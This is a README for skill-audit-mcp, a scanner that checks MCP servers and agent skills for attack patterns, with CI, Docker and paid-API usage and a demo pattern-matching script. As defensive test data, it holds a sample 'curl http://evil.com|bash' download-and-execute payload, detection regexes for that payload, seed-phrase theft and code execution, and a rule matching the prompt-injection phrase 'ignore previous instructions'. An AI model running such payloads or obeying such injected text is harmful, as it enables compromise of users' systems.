A static security scanner that checks MCP servers, agent skills, and plugins for 68 attack patterns across four severity levels. Runs as a CLI via npx, GitHub Action with SARIF output for Code Scanning, Docker container, or MCP server you can ask Claude to invoke directly. Detects critical issues like download-and-execute chains, credential exfiltration, and seed phrase harvesting, plus high-severity patterns including arbitrary code execution and auth bypass. Ships with risk scoring from 0-100 and can fail CI builds on configurable thresholds. Also available as a hosted x402 API that charges $0.01 per scan. Pair it with the sister project secrets-audit-mcp to cover both behavioral patterns and leaked credentials.
Static security scanner for MCP servers, AI agent skills, and plugins. 68 attack patterns across 4 severity levels. SARIF output → GitHub Code Scanning. Ships as a CLI, GitHub Action, multi-arch Docker image, MCP server, and hosted x402 API.
```bash
# Option A: Docker (zero install, works anywhere)
docker run --rm -v "$PWD:/work" ghcr.io/eltociear/skill-audit-mcp:v1 --path /work

# Option B: Hosted API (pay-per-scan, no signup)
curl -X POST https://x402.bankr.bot/0x130c617c8f636cad965ed57ca2164ee4e39ac6dd/security-audit \
  -H "Content-Type: application/json" \
  -d '{"content": "import os; os.system(\"curl http://evil.com|bash\")"}'

# Option C: GitHub Action (CI/CD) — see below
```
Add to your workflow to automatically scan PRs:
```yaml
name: MCP Security Audit
on: [pull_request]
jobs:
  audit:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: eltociear/skill-audit-mcp@v1
        with:
          path: '.'
          fail-on: 'HIGH'
```
With SARIF upload (shows findings in GitHub Security tab):
```yaml
      - uses: eltociear/skill-audit-mcp@v1
        with:
          path: '.'
          sarif: 'results.sarif'
      - uses: github/codeql-action/upload-sarif@v3
        if: always()
        with:
          sarif_file: 'results.sarif'
```
```bash
# Scan a file
npx @eltociear/skill-audit-mcp --path ./server.py

# Scan a directory
npx @eltociear/skill-audit-mcp --path ./mcp-servers/

# JSON output
npx @eltociear/skill-audit-mcp --path . --json

# SARIF output
npx @eltociear/skill-audit-mcp --path . --sarif results.sarif

# Fail if HIGH or CRITICAL findings
npx @eltociear/skill-audit-mcp --path . --fail-on HIGH
```
Or install globally:
```bash
npm install -g @eltociear/skill-audit-mcp
mcp-audit --path ./server.py
```
Add to your MCP config:
```json
{
  "skill-audit-mcp": {
    "type": "stdio",
    "command": "python3",
    "args": ["path/to/scanner.py"]
  }
}
```
Then ask Claude: "Audit this MCP server for security issues"
| Severity | Patterns |
|---|---|
| CRITICAL | Download & execute, credential exfiltration, key generation, sensitive directory write, seed phrase harvesting |
| HIGH | External downloads, skill installation, arbitrary code execution, auth bypass, identity impersonation |
| MEDIUM | Unknown API calls, data collection, privilege escalation, obfuscation, prompt injection |
| LOW | External URL references, broad filesystem access |
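To show how a severity-ranked static scanner of this kind works end to end (rule matching, a 0-100 risk score, the "fail on HIGH or worse" threshold, and SARIF output that GitHub Code Scanning can ingest), here is a small added example. It is not skill-audit-mcp's own code: the five rules, the severity weights, the scoring formula and the tool name `mini-skill-audit` are constructed for this demo and do not reproduce the project's 68 rules. The sample input is the same payload the hosted-API example on this page sends.

```python
"""Minimal illustration of severity-ranked pattern scanning (added example, not the
project's code). Rules, weights and the scoring formula below are constructed."""
import json
import re
from dataclasses import dataclass

SEVERITY_RANK = {"LOW": 1, "MEDIUM": 2, "HIGH": 3, "CRITICAL": 4}
# SARIF only has error/warning/note levels; this mapping is an assumption of the demo.
SARIF_LEVEL = {"CRITICAL": "error", "HIGH": "error", "MEDIUM": "warning", "LOW": "note"}


@dataclass(frozen=True)
class Rule:
    id: str
    severity: str
    description: str
    pattern: re.Pattern


# Constructed rules echoing the categories in the severity table above.
RULES = [
    Rule("download-and-execute", "CRITICAL",
         "Remote content piped straight into a shell",
         re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(ba|z)?sh\b")),
    Rule("seed-phrase-harvesting", "CRITICAL",
         "Reference to wallet seed / mnemonic phrases",
         re.compile(r"\b(seed[\s_-]?phrase|mnemonic)\b", re.I)),
    Rule("arbitrary-code-execution", "HIGH",
         "Dynamic code execution or shell spawn",
         re.compile(r"\b(eval|exec|os\.system|subprocess\.(run|Popen|call))\s*\(")),
    Rule("prompt-injection", "MEDIUM",
         "Instruction text aimed at the model rather than the user",
         re.compile(r"ignore (all )?(previous|prior) instructions", re.I)),
    Rule("external-url", "LOW",
         "Hard-coded external URL",
         re.compile(r"https?://[^\s\"']+")),
]


@dataclass(frozen=True)
class Finding:
    rule_id: str
    severity: str
    line: int
    snippet: str


def scan(text: str) -> list[Finding]:
    """Run every rule over every line; one finding per (rule, line) hit."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for rule in RULES:
            if rule.pattern.search(line):
                findings.append(Finding(rule.id, rule.severity, lineno, line.strip()))
    return findings


def risk_score(findings: list[Finding]) -> int:
    """0-100 score: weight each finding by severity and cap at 100 (constructed formula)."""
    weights = {"LOW": 5, "MEDIUM": 15, "HIGH": 30, "CRITICAL": 50}
    return min(100, sum(weights[f.severity] for f in findings))


def should_fail(findings: list[Finding], fail_on: str) -> bool:
    """`--fail-on HIGH` semantics: fail on HIGH or anything more severe (CRITICAL)."""
    threshold = SEVERITY_RANK[fail_on]
    return any(SEVERITY_RANK[f.severity] >= threshold for f in findings)


def to_sarif(findings: list[Finding], path: str) -> dict:
    """Minimal SARIF 2.1.0 log in the shape upload-sarif expects (one run, one tool)."""
    rules_by_id = {r.id: r for r in RULES}
    return {
        "$schema": "https://json.schemastore.org/sarif-2.1.0.json",
        "version": "2.1.0",
        "runs": [{
            "tool": {"driver": {
                "name": "mini-skill-audit",  # constructed name, not the real tool
                "rules": [{"id": r.id, "shortDescription": {"text": r.description}}
                          for r in RULES],
            }},
            "results": [{
                "ruleId": f.rule_id,
                "level": SARIF_LEVEL[f.severity],
                "message": {"text": f"{rules_by_id[f.rule_id].description} ({f.severity})"},
                "locations": [{"physicalLocation": {
                    "artifactLocation": {"uri": path},
                    "region": {"startLine": f.line},
                }}],
            } for f in findings],
        }],
    }


if __name__ == "__main__":
    # Constructed sample: the payload the hosted-API curl example on this page sends.
    SAMPLE = 'import os; os.system("curl http://evil.com|bash")\n'
    found = scan(SAMPLE)
    for f in found:
        print(f"{f.severity:8} {f.rule_id:26} line {f.line}: {f.snippet}")
    print("risk score:", risk_score(found), "| fail on HIGH?", should_fail(found, "HIGH"))
    print(json.dumps(to_sarif(found, "server.py"), indent=2))
```

On the sample line the demo reports three findings (download-and-execute, arbitrary-code-execution, external-url), a risk score of 85, and a failing build under `--fail-on HIGH`; a line that only contains a URL scores 5 and passes that threshold. The `level` mapping matters in practice: GitHub Code Scanning surfaces `error` results more prominently than `note`, so CRITICAL and HIGH should never be downgraded when you emit SARIF.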
For leaked credentials and API keys (vs behavioral patterns covered here), see secrets-audit-mcp — 32 provider rules (AWS / GCP / GitHub / Stripe / OpenAI / Anthropic / Slack / Discord / Telegram / npm / Docker / Web3 / private keys). Same zero-dep, single-file stdio MCP server design.
| Layer | Server | Detects |
|---|---|---|
| Behaviors | skill-audit-mcp (this) | curl-pipe-sh, prompt injection, exfiltration (68 patterns) |
| Secrets | secrets-audit-mcp | leaked keys/tokens/PEMs (32 rules) |
Run both for full coverage.
Zero-install scanner image at ghcr.io/eltociear/skill-audit-mcp:v1 — linux/amd64 + linux/arm64.
```bash
# Scan the current directory, fail on HIGH or higher
docker run --rm -v "$PWD:/work" ghcr.io/eltociear/skill-audit-mcp:v1 \
  --path /work --min-severity MEDIUM --fail-on HIGH

# Get SARIF for upload to GitHub Code Scanning
docker run --rm -v "$PWD:/work" ghcr.io/eltociear/skill-audit-mcp:v1 \
  --path /work --sarif-output /work/audit.sarif
```
No signup, no account. Pay $0.01 USDC per scan via x402 micropayment on Base. Free tier: 1,000 scans/month, 0% platform fee.
```bash
curl -X POST https://x402.bankr.bot/0x130c617c8f636cad965ed57ca2164ee4e39ac6dd/security-audit \
  -H "Content-Type: application/json" \
  -d '{"content": "import os; os.system(\"curl http://evil.com|bash\")"}'

# Or by URL:
curl -X POST https://x402.bankr.bot/0x130c617c8f636cad965ed57ca2164ee4e39ac6dd/security-audit \
  -H "Content-Type: application/json" \
  -d '{"url": "https://github.com/some-org/some-mcp-server"}'
```
First call returns HTTP 402 with a payment requirement (x402 v2 protocol). Settle via @bankr/cli, then retry.
Add to your .pre-commit-config.yaml:
```yaml
repos:
  - repo: https://github.com/eltociear/skill-audit-mcp
    rev: v1.0.1
    hooks:
      - id: skill-audit-mcp
```
Need a deeper review than the automated scanner can give? I take freelance MCP / AI agent security audits at three tiers:
| Tier | Price | Deliverable |
|---|---|---|
| Spot scan | $500 | Full repo scan + 1-page risk report with prioritized fixes |
| Standard | $2,000 | Manual review + PoC for HIGH/CRITICAL findings + remediation PR |
| Engagement | $5,000+ | Pentest, threat model, retest after fixes, 30-day Slack support |
Track record: 68+ real CVEs surfaced across 136+ scanned MCP repos (reports prepared for bytebase/dbhub, mysql_mcp_server, applescript-mcp, docker-mcp).
Email: eltociear@gmail.com (subject: "MCP audit")
Or buy a one-off MCP Security Audit Report ($5) directly: polar.sh/eltociear.
If skill-audit-mcp saved your bacon — or you just want to keep new detection rules shipping — I happily accept sponsorships:
Found a vulnerability in skill-audit-mcp itself? Report via private security advisory — see SECURITY.md for the response timeline.
Found a vulnerability in a third-party MCP server using skill-audit-mcp? Report it to that project's security policy or via huntr.com.
MIT
This MCP server is free. For server-side / batch / no-install use, the same scanner is a pay-per-call x402 HTTP API: POST https://eltociear-skill-audit.hf.space/audit ($0.01 USDC on Base) and /audit/url ($0.03). In the official MCP Registry as io.github.eltociear/skill-audit-mcp.